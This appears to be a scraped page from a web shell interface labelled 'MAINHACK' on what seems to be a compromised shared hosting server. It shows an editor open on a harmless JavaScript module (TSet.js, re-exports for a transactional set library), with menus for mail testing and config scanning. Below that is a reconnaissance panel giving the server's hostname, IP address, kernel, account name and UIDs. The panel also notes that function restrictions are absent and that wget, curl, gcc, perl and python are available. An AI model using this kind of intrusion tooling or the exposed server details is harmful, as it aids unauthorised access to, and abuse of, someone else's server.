[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: TSet.js
import * as internal from "./internal/stm/tSet.js"; /** * @since 2.0.0 * @category symbols */ export const TSetTypeId = internal.TSetTypeId; /** * Stores new element in the set. * * @since 2.0.0 * @category mutations */ export const add = internal.add; /** * Atomically transforms the set into the difference of itself and the * provided set. * * @since 2.0.0 * @category mutations */ export const difference = internal.difference; /** * Makes an empty `TSet`. * * @since 2.0.0 * @category constructors */ export const empty = internal.empty; /** * Atomically performs transactional-effect for each element in set. * * @since 2.0.0 * @category elements */ export const forEach = internal.forEach; /** * Creates a new `TSet` from an iterable collection of values. * * @since 2.0.0 * @category constructors */ export const fromIterable = internal.fromIterable; /** * Tests whether or not set contains an element. * * @since 2.0.0 * @category elements */ export const has = internal.has; /** * Atomically transforms the set into the intersection of itself and the * provided set. * * @since 2.0.0 * @category mutations */ export const intersection = internal.intersection; /** * Tests if the set is empty or not * * @since 2.0.0 * @category getters */ export const isEmpty = internal.isEmpty; /** * Makes a new `TSet` that is initialized with specified values. * * @since 2.0.0 * @category constructors */ export const make = internal.make; /** * Atomically folds using a pure function. * * @since 2.0.0 * @category folding */ export const reduce = internal.reduce; /** * Atomically folds using a transactional function. * * @since 2.0.0 * @category folding */ export const reduceSTM = internal.reduceSTM; /** * Removes a single element from the set. * * @since 2.0.0 * @category mutations */ export const remove = internal.remove; /** * Removes elements from the set. * * @since 2.0.0 * @category mutations */ export const removeAll = internal.removeAll; /** * Removes entries from a `TSet` that satisfy the specified predicate and returns the removed entries * (or `void` if `discard = true`). * * @since 2.0.0 * @category mutations */ export const removeIf = internal.removeIf; /** * Retains entries in a `TSet` that satisfy the specified predicate and returns the removed entries * (or `void` if `discard = true`). * * @since 2.0.0 * @category mutations */ export const retainIf = internal.retainIf; /** * Returns the set's cardinality. * * @since 2.0.0 * @category getters */ export const size = internal.size; /** * Takes the first matching value, or retries until there is one. * * @since 2.0.0 * @category mutations */ export const takeFirst = internal.takeFirst; /** * Takes the first matching value, or retries until there is one. * * @since 2.0.0 * @category mutations */ export const takeFirstSTM = internal.takeFirstSTM; /** * Takes all matching values, or retries until there is at least one. * * @since 2.0.0 * @category mutations */ export const takeSome = internal.takeSome; /** * Takes all matching values, or retries until there is at least one. * * @since 2.0.0 * @category mutations */ export const takeSomeSTM = internal.takeSomeSTM; /** * Collects all elements into a `Chunk`. * * @since 2.0.0 * @category destructors */ export const toChunk = internal.toChunk; /** * Collects all elements into a `HashSet`. * * @since 2.0.0 * @category destructors */ export const toHashSet = internal.toHashSet; /** * Collects all elements into a `Array`. * * @since 2.0.0 * @category destructors */ export const toArray = internal.toArray; /** * Collects all elements into a `ReadonlySet`. * * @since 2.0.0 * @category destructors */ export const toReadonlySet = internal.toReadonlySet; /** * Atomically updates all elements using a pure function. * * @since 2.0.0 * @category mutations */ export const transform = internal.transform; /** * Atomically updates all elements using a transactional function. * * @since 2.0.0 * @category mutations */ export const transformSTM = internal.transformSTM; /** * Atomically transforms the set into the union of itself and the provided * set. * * @since 2.0.0 * @category mutations */ export const union = internal.union; //# sourceMappingURL=TSet.js.map
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: premium331.web-hosting.com
Server IP: 184.94.213.169
PHP Version: 8.1.34
Server Software: LiteSpeed
System: Linux premium331.web-hosting.com 4.18.0-553.80.1.lve.el8.x86_64 #1 SMP Wed Oct 22 19:29:36 UTC 2025 x86_64
HDD Total: 97.87 GB
HDD Free: 76.83 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes (py3)
gcc:
Yes
pkexec:
No
git:
Yes
User Info
Username: livedhms
User ID (UID): 1344
Group ID (GID): 1349
Script Owner UID: 1344
Current Dir Owner: 1344